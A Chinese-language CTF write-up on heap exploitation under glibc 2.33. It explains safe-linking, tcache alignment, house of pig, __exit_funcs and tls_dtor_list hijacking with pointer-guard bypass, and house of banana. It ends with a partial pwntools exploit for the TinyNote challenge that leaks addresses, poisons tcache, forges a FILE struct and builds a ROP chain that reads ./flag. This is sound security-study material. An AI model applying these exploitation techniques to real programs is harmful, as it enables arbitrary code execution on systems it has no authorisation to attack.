Glibc 2.33怎么玩？

一些新增机制

safe-linking

从Glibc 2.32开始，对tcache单向链表引入safe-linking的保护机制：

/* Caller must ensure that we know tc_idx is valid and there's room
   for more chunks.  */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache;

  e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)

需要注意的是，safe-linking同样从Glibc 2.32开始就被应用到了fastbin的fd指针上（tcache与fastbin是同时引入该机制的，并非到2.33才应用到fastbin）。

这样其实并没有给利用带来很大的影响，甚至更加容易leak heap address（只需要free一个chunk）。

tcache alignment

在Glibc 2.31及以前，tcache poisoning可以完成任意地址分配，但是从Glibc 2.32开始，多了一个check，即tcache chunk也需要0x10对齐：

/* Caller must ensure that we know tc_idx is valid and there's
   available chunks to remove.  */
static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  if (__glibc_unlikely (!aligned_OK (e)))
    malloc_printerr ("malloc(): unaligned tcache chunk detected");
  tcache->entries[tc_idx] = REVEAL_PTR (e->next);
  --(tcache->counts[tc_idx]);
  e->key = NULL;
  return (void *) e;
}

利用技巧

目前总结的利用技巧主要分为四种：

_IO_FILE
__exit_funcs
tls_dtor_list
link_map

下文的出发点在于已经获得一些primitive可以通过堆利用，完成对一些内存地址的读写，如利用fastbin reverse into tcache或者large bin attack向某个地址写入堆地址等。

_IO_FILE

house of pig

从源码的角度上深入分析house of pig整个利用链：

首先不论是程序正常从__libc_start_main中返回时，还是从显式提供的exit中返回，抑或是abort（有待考证），其原理都是最终需要调用_IO_flush_all_lockp。

以exit举例：

/* Call all functions registered with `atexit' and `on_exit',
   in the reverse of the order in which they were registered
   perform stdio cleanup, and terminate program execution with STATUS.  */
void
attribute_hidden
__run_exit_handlers (int status, struct exit_function_list **listp,
		     bool run_list_atexit, bool run_dtors)
{
  /* First, call the TLS destructors.  */
#ifndef SHARED
  if (&__call_tls_dtors != NULL)
#endif
    if (run_dtors)
      __call_tls_dtors ();

  /* We do it this way to handle recursive calls to exit () made by
     the functions registered with `atexit' and `on_exit'. We call
     everyone on the list and use the status value in the last
     exit (). */
  while (true)
    {
      struct exit_function_list *cur;

      __libc_lock_lock (__exit_funcs_lock);

    restart:
      cur = *listp;

      if (cur == NULL)
	{
	  /* Exit processing complete.  We will not allow any more
	     atexit/on_exit registrations.  */
	  __exit_funcs_done = true;
	  __libc_lock_unlock (__exit_funcs_lock);
	  break;
	}

      while (cur->idx > 0)
	{
	  struct exit_function *const f = &cur->fns[--cur->idx];
	  const uint64_t new_exitfn_called = __new_exitfn_called;

	  /* Unlock the list while we call a foreign function.  */
	  __libc_lock_unlock (__exit_funcs_lock);
	  switch (f->flavor)
	    {
	      void (*atfct) (void);
	      void (*onfct) (int status, void *arg);
	      void (*cxafct) (void *arg, int status);

	    case ef_free:
	    case ef_us:
	      break;
	    case ef_on:
	      onfct = f->func.on.fn;
#ifdef PTR_DEMANGLE
	      PTR_DEMANGLE (onfct);
#endif
	      onfct (status, f->func.on.arg);
	      break;
	    case ef_at:
	      atfct = f->func.at;
#ifdef PTR_DEMANGLE
	      PTR_DEMANGLE (atfct);
#endif
	      atfct ();
	      break;
	    case ef_cxa:
	      /* To avoid dlclose/exit race calling cxafct twice (BZ 22180),
		 we must mark this function as ef_free.  */
	      f->flavor = ef_free;
	      cxafct = f->func.cxa.fn;
#ifdef PTR_DEMANGLE
	      PTR_DEMANGLE (cxafct);
#endif
	      cxafct (f->func.cxa.arg, status);
	      break;
	    }
	  /* Re-lock again before looking at global state.  */
	  __libc_lock_lock (__exit_funcs_lock);

	  if (__glibc_unlikely (new_exitfn_called != __new_exitfn_called))
	    /* The last exit function, or another thread, has registered
	       more exit functions.  Start the loop over.  */
	    goto restart;
	}

      *listp = cur->next;
      if (*listp != NULL)
	/* Don't free the last element in the chain, this is the statically
	   allocate element.  */
	free (cur);

      __libc_lock_unlock (__exit_funcs_lock);
    }

  if (run_list_atexit)
    RUN_HOOK (__libc_atexit, ());

  _exit (status);
}


void
exit (int status)
{
  __run_exit_handlers (status, &__exit_funcs, true, true);
}
libc_hidden_def (exit)

不论__run_exit_handlers中间通过__exit_funcs结构做了多少相关操作，exit最终都会进入下面这段逻辑：

if (run_list_atexit)
  RUN_HOOK (__libc_atexit, ());

由于run_list_atexit是__run_exit_handlers的第三个参数，为true，那么一定会调用这个HOOK函数。

那么这个HOOK函数是什么，结合IDA以及GDB，可以发现它其实是_IO_cleanup：

__libc_atexit:00000000001E2608
__libc_atexit:00000000001E2608 ; Segment type: Pure data
__libc_atexit:00000000001E2608 ; Segment permissions: Read/Write
__libc_atexit:00000000001E2608 __libc_atexit   segment qword public 'DATA' use64
__libc_atexit:00000000001E2608                 assume cs:__libc_atexit
__libc_atexit:00000000001E2608                 ;org 1E2608h
__libc_atexit:00000000001E2608 off_1E2608      dq offset _IO_cleanup   ; DATA XREF: __run_exit_handlers+1DA↑o
__libc_atexit:00000000001E2608                                         ; sub_59840+1642↑o ...
__libc_atexit:00000000001E2608 __libc_atexit   ends
__libc_atexit:00000000001E2608

这个_IO_cleanup就会执行我们所需要的_IO_flush_all_lockp：

int
_IO_cleanup (void)
{
  /* We do *not* want locking.  Some threads might use streams but
     that is their problem, we flush them underneath them.  */
  int result = _IO_flush_all_lockp (0);

  /* We currently don't have a reliable mechanism for making sure that
     C++ static destructors are executed in the correct order.
     So it is possible that other static destructors might want to
     write to cout - and they're supposed to be able to do so.

     The following will make the standard streambufs be unbuffered,
     which forces any output from late destructors to be written out. */
  _IO_unbuffer_all ();

  return result;
}

那么，_IO_flush_all_lockp又干了什么，通过这个调用我们能怎样完成利用：

int
_IO_flush_all_lockp (int do_lock)
{
  int result = 0;
  FILE *fp;

#ifdef _IO_MTSAFE_IO
  _IO_cleanup_region_start_noarg (flush_cleanup);
  _IO_lock_lock (list_all_lock);
#endif

  for (fp = (FILE *) _IO_list_all; fp != NULL; fp = fp->_chain)
    {
      run_fp = fp;
      if (do_lock)
	_IO_flockfile (fp);

      if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
	   || (_IO_vtable_offset (fp) == 0
	       && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
				    > fp->_wide_data->_IO_write_base))
	   )
	  && _IO_OVERFLOW (fp, EOF) == EOF)
	result = EOF;

      if (do_lock)
	_IO_funlockfile (fp);
      run_fp = NULL;
    }

#ifdef _IO_MTSAFE_IO
  _IO_lock_unlock (list_all_lock);
  _IO_cleanup_region_end (0);
#endif

  return result;
}

可以很清楚地看到，该函数的逻辑可以简单地理解为：从_IO_list_all（默认情况下指向_IO_2_1_stderr_）出发，沿_chain依次遍历标准错误、标准输出、标准输入流，并根据情况调用_IO_OVERFLOW(fp, EOF)刷新相应流的缓冲区。

考虑到利用场景下，我们可以劫持_IO_list_all，或者stderr，stdout，stdin的_chain成员，从而引入一个fake _IO_FILE结构体（记为fake_fp）。

在满足如下两种条件之一的情况下：（显然第一个条件更为简单）

fake_fp->_mode <= 0：
- fake_fp->_IO_write_ptr > fake_fp->_IO_write_base：
fake_fp->_mode > 0：
- fake_fp->_vtable_offset = 0 && fake_fp->_wide_data->_IO_write_ptr > fake_fp->_wide_data->_IO_write_base

会调用fake_fp->_vtable->_IO_overflow_t即vtable + 0x18处的指针指向的函数，且第一个参数为fake_fp自身。

再考虑从Glibc 2.24开始引入的vtable check：vtable指针必须落在libc中存放合法vtable的区域内，因此虽然不能再让vtable指向任意伪造的地址，但仍然可以调用任意合法vtable中的任意函数指针。

而house of pig即是在这个基础上，使得fake_fp->vtable = _IO_str_jumps，那么实际调用的_IO_overflow_t为_IO_str_overflow：

int
_IO_str_overflow (FILE *fp, int c)
{
  int flush_only = c == EOF;
  size_t pos;
  if (fp->_flags & _IO_NO_WRITES)
      return flush_only ? 0 : EOF;
  if ((fp->_flags & _IO_TIED_PUT_GET) && !(fp->_flags & _IO_CURRENTLY_PUTTING))
    {
      fp->_flags |= _IO_CURRENTLY_PUTTING;
      fp->_IO_write_ptr = fp->_IO_read_ptr;
      fp->_IO_read_ptr = fp->_IO_read_end;
    }
  pos = fp->_IO_write_ptr - fp->_IO_write_base;
  if (pos >= (size_t) (_IO_blen (fp) + flush_only))
    {
      if (fp->_flags & _IO_USER_BUF) /* not allowed to enlarge */
	return EOF;
      else
	{
	  char *new_buf;
	  char *old_buf = fp->_IO_buf_base;
	  size_t old_blen = _IO_blen (fp);
	  size_t new_size = 2 * old_blen + 100;
	  if (new_size < old_blen)
	    return EOF;
	  new_buf = malloc (new_size);
	  if (new_buf == NULL)
	    {
	      /*	  __ferror(fp) = 1; */
	      return EOF;
	    }
	  if (old_buf)
	    {
	      memcpy (new_buf, old_buf, old_blen);
	      free (old_buf);
	      /* Make sure _IO_setb won't try to delete _IO_buf_base. */
	      fp->_IO_buf_base = NULL;
	    }
	  memset (new_buf + old_blen, '\0', new_size - old_blen);

	  _IO_setb (fp, new_buf, new_buf + new_size, 1);
	  fp->_IO_read_base = new_buf + (fp->_IO_read_base - old_buf);
	  fp->_IO_read_ptr = new_buf + (fp->_IO_read_ptr - old_buf);
	  fp->_IO_read_end = new_buf + (fp->_IO_read_end - old_buf);
	  fp->_IO_write_ptr = new_buf + (fp->_IO_write_ptr - old_buf);

	  fp->_IO_write_base = new_buf;
	  fp->_IO_write_end = fp->_IO_buf_end;
	}
    }

  if (!flush_only)
    *fp->_IO_write_ptr++ = (unsigned char) c;
  if (fp->_IO_write_ptr > fp->_IO_read_end)
    fp->_IO_read_end = fp->_IO_write_ptr;
  return c;
}
libc_hidden_def (_IO_str_overflow)

这里的malloc，memcpy和free就是关键所在，即等价于执行了：

ptr = malloc((fake_fp->_IO_buf_end - fake_fp->_IO_buf_base) * 2 + 100)
memcpy(ptr, fake_fp->_IO_buf_base, fake_fp->_IO_buf_end - fake_fp->_IO_buf_base)
free(fake_fp->_IO_buf_base)

同时注意到，这里存在一个限制：

int flush_only = c == EOF;
...
pos = fp->_IO_write_ptr - fp->_IO_write_base;
if (pos >= (size_t) (_IO_blen (fp) + flush_only))
{
    if (fp->_flags & _IO_USER_BUF) /* not allowed to enlarge */
		return EOF;
    else
    {
        ... // need to be here
    }
}

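即fake_fp->_IO_write_ptr - fake_fp->_IO_write_base > fake_fp->_IO_buf_end - fake_fp->_IO_buf_base（由于c == EOF时flush_only为1，pos >= blen + 1等价于pos > blen），以及(fake_fp->_flags & _IO_USER_BUF) == 0。此外，函数开头还检查了_IO_NO_WRITES标志，因此还需要保证(fake_fp->_flags & _IO_NO_WRITES) == 0，否则会在进入这段逻辑之前直接返回。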

做个小小的总结，伪造的_IO_FILE只要满足：

(_flags & _IO_NO_WRITES) == 0
(_flags & _IO_USER_BUF) == 0
_mode <= 0
_IO_write_ptr - _IO_write_base > _IO_buf_end - _IO_buf_base
vtable = _IO_str_jumps （或者其他含有_IO_str_overflow指针的vtable）

就可以愉快地调用malloc，memcpy和free了。

__exit_funcs

上面在分析exit的时候，跳过了__exit_funcs的逻辑，实际上，__exit_funcs作为libc中的全局变量，是可以被修改的：

void
exit (int status)
{
  __run_exit_handlers (status, &__exit_funcs, true, true);
}
libc_hidden_def (exit)

首先，关注一下__exit_funcs里，存的到底是个什么东西，实际上，它存放了一个exit_function_list结构体指针：

struct exit_function_list
{
    struct exit_function_list *next;
    size_t idx;
    struct exit_function fns[32];
};

struct exit_function
{
    /* `flavour' should be of type of the `enum' above but since we need
       this element in an atomic operation we have to use `long int'.  */
    long int flavor;
    union
    {
        void (*at) (void);
        struct
        {
            void (*fn) (int status, void *arg);
            void *arg;
        } on;
        struct
        {
            void (*fn) (void *arg, int status);
            void *arg;
            void *dso_handle;
        } cxa;
    } func;
};

其中，毋庸置疑，next成员组织了一条单向链表，它遍历的行为，就是在每轮循环后，用next覆盖__exit_funcs：（不过不是很重要）

*listp = cur->next; // listp = &__exit_funcs

关键在于，idx指明了fns数组中有效exit_function的数量，遍历时会从后往前访问fns数组，并根据其中的flavor成员进行相应的函数调用：

switch (f->flavor)
{
    void (*atfct) (void);
    void (*onfct) (int status, void *arg);
    void (*cxafct) (void *arg, int status);

    case ef_free: // 0
    case ef_us:   // 1
      break;
    case ef_on:   // 2
      onfct = f->func.on.fn;
#ifdef PTR_DEMANGLE
      PTR_DEMANGLE (onfct);
#endif
      onfct (status, f->func.on.arg);
      break;
    case ef_at:   // 3
      atfct = f->func.at;
#ifdef PTR_DEMANGLE
      PTR_DEMANGLE (atfct);
#endif
      atfct ();
      break;
    case ef_cxa:  // 4
      /* To avoid dlclose/exit race calling cxafct twice (BZ 22180),
     we must mark this function as ef_free.  */
      f->flavor = ef_free;
      cxafct = f->func.cxa.fn;
#ifdef PTR_DEMANGLE
      PTR_DEMANGLE (cxafct);
#endif
      cxafct (f->func.cxa.arg, status);
      break;
}

不难想到，如果我们劫持__exit_funcs，设置其idx = 1，然后相应地设置fns[0]，就可以完成任意函数调用了，如果关注一下case ef_cxa的情况，甚至函数的第一个参数都是可控的。

然而事实却并非那么简单，注意到：

#ifdef PTR_DEMANGLE
      PTR_DEMANGLE (cxafct);
#endif

/* Pointer mangling support.  */
#if IS_IN (rtld)
/* We cannot use the thread descriptor because in ld.so we use setjmp
   earlier than the descriptor is initialized.  */
# ifdef __ASSEMBLER__
#  define PTR_MANGLE(reg)	xor __pointer_chk_guard_local(%rip), reg;    \
				rol $2*LP_SIZE+1, reg
#  define PTR_DEMANGLE(reg)	ror $2*LP_SIZE+1, reg;			     \
				xor __pointer_chk_guard_local(%rip), reg
# else
#  define PTR_MANGLE(reg)	asm ("xor __pointer_chk_guard_local(%%rip), %0\n" \
				     "rol $2*" LP_SIZE "+1, %0"			  \
				     : "=r" (reg) : "0" (reg))
#  define PTR_DEMANGLE(reg)	asm ("ror $2*" LP_SIZE "+1, %0\n"		  \
				     "xor __pointer_chk_guard_local(%%rip), %0"   \
				     : "=r" (reg) : "0" (reg))
# endif
#else
# ifdef __ASSEMBLER__
#  define PTR_MANGLE(reg)	xor %fs:POINTER_GUARD, reg;		      \
				rol $2*LP_SIZE+1, reg
#  define PTR_DEMANGLE(reg)	ror $2*LP_SIZE+1, reg;			      \
				xor %fs:POINTER_GUARD, reg
# else
#  define PTR_MANGLE(var)	asm ("xor %%fs:%c2, %0\n"		      \
				     "rol $2*" LP_SIZE "+1, %0"		      \
				     : "=r" (var)			      \
				     : "0" (var),			      \
				       "i" (offsetof (tcbhead_t,	      \
						      pointer_guard)))
#  define PTR_DEMANGLE(var)	asm ("ror $2*" LP_SIZE "+1, %0\n"	      \
				     "xor %%fs:%c2, %0"			      \
				     : "=r" (var)			      \
				     : "0" (var),			      \
				       "i" (offsetof (tcbhead_t,	      \
						      pointer_guard)))
# endif
#endif

简单来说，这里存在一个指针加解密的操作，即f->func.cxa.fn是被加密过的，如果直接写入目标地址，那么解密后会得到一个非法地址，显然会SIGSEGV。

但是考虑得更深一步的话，会发现，这个解密操作ror(ptr, 17) ^ fs:[0x30]中，fs:[0x30]位于TLS处，是完全可写的位置，如果将其修改为一个已知值，那么指针加密的问题就迎刃而解了。

如何定位到TLS的位置，实际上本地环境和远程环境往往存在差异，但是空间并不大，爆破是完全可取的

至于如何在本地定位到这个fs:[0x30]，目前我的做法是：

注意到在ld中执行相应逻辑时，PTR_DEMANGLE的宏定义中，取的不是fs:[0x30]，而是__pointer_chk_guard_local

因此，完全可以先读到__pointer_chk_guard_local，然后在内存中搜索即可，因为两者值是完全一致的

解决这个问题之后，那么只要设置好加密指针和函数，目的就已经达到了。

同样做个小小的总结，伪造的exit_function_list（即__exit_funcs指向的结构体）只要满足：

idx = 1
fns[0].flavor = ef_cxa
fns[0].func.cxa.fn = rol(fs:[0x30] ^ system, 17)
fns[0].func.cxa.arg = &str_bin_sh

就可以在exit的时候，调用system("/bin/sh")了；当然，如果要orw的话，做相应的修改即可，这点与打__free_hook应该没什么区别。

tls_dtor_list

不小心忽略了__run_exit_handlers中，最开始的一部分代码了：

  /* First, call the TLS destructors.  */
#ifndef SHARED
    if (&__call_tls_dtors != NULL)
#endif
    if (run_dtors)
      __call_tls_dtors ();

首先从传参的角度，run_dtors = true，必然进入到__call_tls_dtors中；且从注释里面可以看到，这其实是要对TLS进行析构。

深入分析__call_tls_dtors：

static __thread struct dtor_list *tls_dtor_list;

/* Call the destructors.  This is called either when a thread returns from the
   initial function or when the process exits via the exit function.  */
void
__call_tls_dtors (void)
{
  while (tls_dtor_list)
    {
      struct dtor_list *cur = tls_dtor_list;
      dtor_func func = cur->func;
#ifdef PTR_DEMANGLE
      PTR_DEMANGLE (func);
#endif

      tls_dtor_list = tls_dtor_list->next;
      func (cur->obj);

      /* Ensure that the MAP dereference happens before
	 l_tls_dtor_count decrement.  That way, we protect this access from a
	 potential DSO unload in _dl_close_worker, which happens when
	 l_tls_dtor_count is 0.  See CONCURRENCY NOTES for more detail.  */
      atomic_fetch_add_release (&cur->map->l_tls_dtor_count, -1);
      free (cur);
    }
}
libc_hidden_def (__call_tls_dtors)

简单明了，tls_dtor_list存放在TLS上，且处于可写的地址处，如果能够劫持tls_dtor_list，就可以任意函数调用了，且第一个参数同样可控：

typedef void (*dtor_func) (void *);

struct dtor_list
{
  dtor_func func;
  void *obj;
  struct link_map *map;
  struct dtor_list *next;
};

同样的问题是，该指针仍然是被加密的，如果能够修改fs:[0x30]的值，同样可以完成bypass。

link_map

来自安全客的一篇house of banana，利用核心在于劫持_rtld_global的link_map结构，同样是因为这篇house of banana虽然给了poc，但是原理还是得弄清楚，虽然可能不常用，但是说不定什么时候就派上用场了。

_rtld_global作为一个ld中的全局变量，它是一个rtld_global结构体，但如果要从结构体入手分析，则过于复杂，因此选择从被引函数分析入手。

那么问题在于，_rtld_global在哪里被调用了，实际上，它是通过exit中，解析__exit_funcs后调用的_dl_fini中被调用的，如果直接在_dl_fini中下断点，不难根据调用栈定位到。

那么，分析一下_dl_fini：（因为过长，所以选择关键部分）

首先第一部分：

 for (Lmid_t ns = GL(dl_nns) - 1; ns >= 0; --ns)
    {
      /* Protect against concurrent loads and unloads.  */
      __rtld_lock_lock_recursive (GL(dl_load_lock));

      unsigned int nloaded = GL(dl_ns)[ns]._ns_nloaded;
      /* No need to do anything for empty namespaces or those used for
	 auditing DSOs.  */
      if (nloaded == 0
#ifdef SHARED
	  || GL(dl_ns)[ns]._ns_loaded->l_auditing != do_audit
#endif
	  )
	__rtld_lock_unlock_recursive (GL(dl_load_lock));
      else
	{
	  /* Now we can allocate an array to hold all the pointers and
	     copy the pointers in.  */
	  struct link_map *maps[nloaded];

	  unsigned int i;
	  struct link_map *l;
	  assert (nloaded != 0 || GL(dl_ns)[ns]._ns_loaded == NULL);
	  for (l = GL(dl_ns)[ns]._ns_loaded, i = 0; l != NULL; l = l->l_next)
	    /* Do not handle ld.so in secondary namespaces.  */
	    if (l == l->l_real)
	      {
		assert (i < nloaded);

		maps[i] = l;
		l->l_idx = i;
		++i;

		/* Bump l_direct_opencount of all objects so that they
		   are not dlclose()ed from underneath us.  */
		++l->l_direct_opencount;
	      }
   ...

通常情况下，这里GL(dl_nns)即_rtld_global->_dl_nns = 1，从而引出了我们的目标GL(dl_ns)[ns]._ns_loaded，即_rtld_global->_dl_ns[0]->_ns_loaded这个link_map结构体指针；而这里的逻辑，其实就是通过link_map->l_next遍历单向链表，然后依次放入到maps中。

关键在于第二部分：

/* Dynamic-section tags used as indices into l->l_info[].  The _dl_fini
   code below reads DT_FINI_ARRAY (0x1A) and DT_FINI_ARRAYSZ (0x1C);
   DT_INIT_ARRAYSZ is kept only because the original excerpt quoted it.  */
#define	DT_FINI_ARRAY	26		/* Array with addresses of fini fct */
#define	DT_INIT_ARRAYSZ	27		/* Size in bytes of DT_INIT_ARRAY */
#define	DT_FINI_ARRAYSZ	28		/* Size in bytes of DT_FINI_ARRAY */

for (i = 0; i < nmaps; ++i)
{
      struct link_map *l = maps[i];

  	if (l->l_init_called)
	{
  		/* Make sure nothing happens if we are called twice.  */
  		l->l_init_called = 0;

 		 /* Is there a destructor function?  */
  		if (l->l_info[DT_FINI_ARRAY] != NULL
      	|| (ELF_INITFINI && l->l_info[DT_FINI] != NULL))
    	{
     		/* When debugging print a message first.  */
     		if (__builtin_expect (GLRO(dl_debug_mask)
                & DL_DEBUG_IMPCALLS, 0))
    		_dl_debug_printf ("\ncalling fini: %s [%lu]\n\n",
              DSO_FILENAME (l->l_name),
              ns);

      		/* First see whether an array is given.  */
      		if (l->l_info[DT_FINI_ARRAY] != NULL)
    		{
     	 		ElfW(Addr) *array =
   					(ElfW(Addr) *) (l->l_addr
               						 + l->l_info[DT_FINI_ARRAY]->d_un.d_ptr);
      			unsigned int i = (l->l_info[DT_FINI_ARRAYSZ]->d_un.d_val
                / sizeof (ElfW(Addr)));
     			 while (i-- > 0)
        			((fini_t) array[i]) ();
    		}
     ...

简而言之，这段逻辑通过l->l_info数组中存放的各个section的位置，定位fini_array数组，并且依次进行调用。

结合struct link_map结构体数据结构，需要伪造以下结构体成员：

_rtld_global->_dl_ns[0]->_ns_loaded: (link map) 
offset           member
0x0              l_addr         (point to program base by default)
0x18             l_next         (point to next link map, the length of the linked list should be 4)
0x28             l_real         (point to itself)
0x110            l_info[0x1A]   (
                                    point to fini_array Elf64_Dyn structure:
                                    typedef struct
                                    {
                                    Elf64_Sxword	d_tag;			/* Dynamic entry type */
                                    union
                                        {
                                            Elf64_Xword d_val;		/* Integer value */             
                                            Elf64_Addr d_ptr;	    /* Address value */       
                                        							// l_info[0x1A]->d_un.d_ptr + l_addr = &fini_array
                                        } d_un;
                                    } Elf64_Dyn;)
                                )
0x120            l_info[0x1C]   (point to fini_array_size Elf64_Dyn structure)         // l_info[0x1C]->d_un.d_val = sizeof(fini_array)
0x31C            l_init_called  (should be non-zero)

关于为什么linked list的长度要是4，其实原文章中提到的是需要>=4，但是在调试所给的PoC时，同时结合源码分析，发现只能=4：

这应该是和初始化_rtld_global->_dl_ns->_ns_nloaded的值有关（这里是4），同时需要满足下面3个assert：

assert (i < nloaded);
...
assert (ns != LM_ID_BASE || i == nloaded);
assert (ns == LM_ID_BASE || i == nloaded || i == nloaded - 1);
故在ns = LM_ID_BASE的情况下（默认如此），满足的约束为i == nloaded。

不过还需具体情况下，进行调试分析得出。

同样小小总结一下，我们主要需要伪造一个link_map结构体，即_rtld_global->_dl_ns[0]->_ns_loaded指向的结构体：

l_addr为基址
l_next维护的单向链表长度为4
l_real为结构体本身，即对于链表中每个link_map节点，其值必须等于本身
l_info[0x1A]为struct Elf64_Dyn *，其指向的结构体需要满足l_info[0x1A]->d_un.d_ptr + l_addr = fake_fini_array
l_info[0x1C]同为struct Elf64_Dyn *，其指向的结构体需要满足l_info[0x1C]->d_un.d_val = sizeof(fake_fini_array)
l_init_called需不为0
fake_fini_array中布置好需要调用的函数指针

那么在程序exit进入_dl_fini后，就能调用目标函数。

示例

西湖论剑2021的TinyNote，这题需要通过fastbin_reverse_into_tcache，来实现“任意”地址写tcache_pthread_struct的地址。
但是，像上面提到的，由于tcache chunk现在需要对齐到0x10，且fd指针是受safe-linking机制保护的指针（值本身是非法地址），所以只能够实现向0x???????????8的位置，写入tcache_pthread_struct的地址。
那么综合考虑以上的利用方案，我们可以修改stderr->_chain，也可以修改__exit_funcs；至于_rtld_global->_dl_ns[0]->_ns_loaded和tls_dtor_list，都无法修改成合法的地址（因为它们地址都是0x??????????10）。
所以下面的exp主要通过两种方案来实现orw，一种是改stderr->_chain，通过exit触发_IO_flush_all_lockp完成利用；一种是伪造__exit_funcs，不过同样是在exit的时候完成利用。

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
import sys, os, re

context(arch='amd64', os='linux', log_level='debug')

_proc = os.path.abspath('./TinyNote')
_libc = os.path.abspath('./libc-2.33.so')

libc = ELF(_libc)
elf = ELF(_proc)

_debug = int(sys.argv[1]) if len(sys.argv) > 1 else 0

p = process(argv=[_proc])
if _debug != 0:
    gdb.attach(p)

# menu: maps an action name to the number sent at the "Choice:" prompt
choose_items = {
    "add": 1,
    "edit": 2,
    "show": 3,
    "delete": 4,
    "bonus": 5  # not referenced anywhere in the visible script
}

def choose(idx):
    """Answer the "Choice:" menu prompt with the numeric option `idx`."""
    selection = str(idx)
    p.sendlineafter("Choice:", selection)

def add(idx):
    """Run the menu's "add" action on note slot `idx`."""
    action = choose_items['add']
    choose(action)
    slot = str(idx)
    p.sendlineafter("Index:", slot)

def edit(idx, content):
    """Run the menu's "edit" action: send `content` as the new body of note `idx`.

    `content` is sent as-is, without a trailing newline.
    """
    action = choose_items['edit']
    choose(action)
    slot = str(idx)
    p.sendlineafter("Index:", slot)
    p.sendafter("Content:", content)

def show(idx):
    """Run the menu's "show" action on note `idx`; the caller reads the reply from `p`."""
    action = choose_items['show']
    choose(action)
    slot = str(idx)
    p.sendlineafter("Index:", slot)

def delete(idx):
    """Run the menu's "delete" action on note slot `idx`."""
    action = choose_items['delete']
    choose(action)
    slot = str(idx)
    p.sendlineafter("Index:", slot)

def arbitrary_write(addr, content):
    """Write `content` at `addr` by poisoning a tcache bin.

    Relies on script state prepared before the call: the global `heap_base`,
    note 0 aliasing the tcache struct (so editing it rewrites a bin count),
    and note 1 being a chunk that can be freed and still edited afterwards.
    Clobbers note slots 1 and 2.

    NOTE(review): `addr` presumably has to be 0x10-aligned to pass the
    tcache alignment check, and the `heap_base >> 12` key assumes the freed
    chunk lives in the first heap page -- confirm for the target.
    """
    delete(1)                               # free note 1 so it sits in a tcache bin
    edit(0, "\x02")                         # fake the bin count as 2 so two allocations come from the bin
    edit(1, p64(addr ^ (heap_base >> 12)))  # safe-linking: stored next = addr ^ (position >> 12)
    add(1)                                  # first allocation pops the freed chunk
    add(2)                                  # second allocation is served from `addr`
    edit(2, content)                        # write the payload through note 2

#################################### Method 1: hijack stderr
# leak heap base
add(0)
delete(0)
add(0)
show(0)
p.recvuntil("Content:")
heap_base = u64(p.recv(8)) << 12

# leak libc base
for i in range(0x23):
    add(1)
add(2)
delete(1)
delete(2)
edit(2, p64((heap_base + 0x290) ^ (heap_base >> 12)))
add(1)
add(1)
edit(1, p64(0) + p64(0x421))
delete(0)
add(0)
show(0)
p.recvuntil("Content:")
libc_base = u64(p.recv(8)) - 0x1e0ba0 - 0x450

# malloc tcache_struct
add(1)
delete(0)
delete(1)
edit(1, p64((heap_base + 0x10) ^ (heap_base >> 12)))
add(0)
add(0) # chunk 0 points to tcache_struct

# prepare fastbin
add(1)
for i in range(5):
    add(2)
    edit(2, p64((heap_base + 0x310 + 0x20 * i) ^ (heap_base >> 12)))
add(2)
edit(2, p64((libc_base + libc.sym['_IO_2_1_stderr_'] + 0x68 - 0x18) ^ (heap_base >> 12)))
edit(0, "\x07") # "fill" the tcache bin
delete(1) # put into fastbin
edit(1, p64((heap_base + 0x2F0) ^ (heap_base >> 12))) # prepare for fastbin reverse into tcache attack

# fastbin reverse into tcache attack, this will change stderr->_chain
edit(0, "\x00") # "clear" the tcache bin
add(1)

# forge the fake FILE. NOTE(review): the original comment said "stdout", but the offsets
# below match a FILE laid out at heap_base + 0x10 (see the _IO_FILE offset notes at the
# end of the script), presumably the one stderr->_chain was just redirected to -- confirm.
edit(0, "\x00") # "clear" the tcache bin
arbitrary_write(heap_base + 0x30, p64(0) + p64(0xFFFFFFFFFFFF)) # _IO_write_base = 0, _IO_write_ptr = 0xFFFFFFFFFFFF (make sure _IO_write_ptr - _IO_write_base > _IO_buf_end - _IO_buf_base)
arbitrary_write(heap_base + 0x40, p64(0) + p64(heap_base + 0xE00)) # _IO_write_end = 0, _IO_buf_base = source buffer start
arbitrary_write(heap_base + 0x50, p64(heap_base + 0xE00 + 0xB0)) # _IO_buf_end = source buffer end (buffer length 0xB0)
arbitrary_write(heap_base + 0xe0, p64(0) + p64(libc_base + 0x1e2560)) # vtable (at heap_base + 0xe8) = _IO_str_jumps, hard-coded libc offset

# ORW
def orw_payload(libc_base, orwchain_base):
    """Build an open/read/puts ROP chain that prints the contents of ./flag.

    libc_base     -- load address of libc; the gadget offsets are hard-coded
                     for the libc this script targets.
    orwchain_base -- address at which the returned chain will be placed; used
                     to compute the address of the trailing "./flag" path and
                     of the scratch read buffer (orwchain_base + 0x100).

    Returns the chain as a byte string.  The accumulator and the path are byte
    literals so the concatenation with flat() also works on Python 3, where
    flat() returns bytes; on Python 2 the result is unchanged.
    """
    pop_rdi = libc_base + 0x0000000000028a55 # pop rdi ; ret
    pop_rsi = libc_base + 0x000000000002a4cf # pop rsi ; ret
    pop_rdx = libc_base + 0x00000000000c7f32 # pop rdx ; ret
    # 3 function addresses (8 bytes each) + 6 "pop reg; value" pairs (0x10 each)
    # = 0x78 bytes of chain, so the path string starts right after the chain.
    func_cnt = 3
    args_cnt = 2 + 3 + 1
    payload = b""
    # open("./flag", 0)
    payload += flat([pop_rdi, orwchain_base + func_cnt * 8 + args_cnt * 0x10, pop_rsi, 0, libc_base + libc.sym['open']])
    # read(3, buf, 0x40) -- NOTE(review): assumes open() returned fd 3
    payload += flat([pop_rdi, 3, pop_rsi, orwchain_base + 0x100, pop_rdx, 0x40, libc_base + libc.sym['read']])
    # puts(buf)
    payload += flat([pop_rdi, orwchain_base + 0x100, libc_base + libc.sym['puts']])
    payload += b"./flag"
    return payload

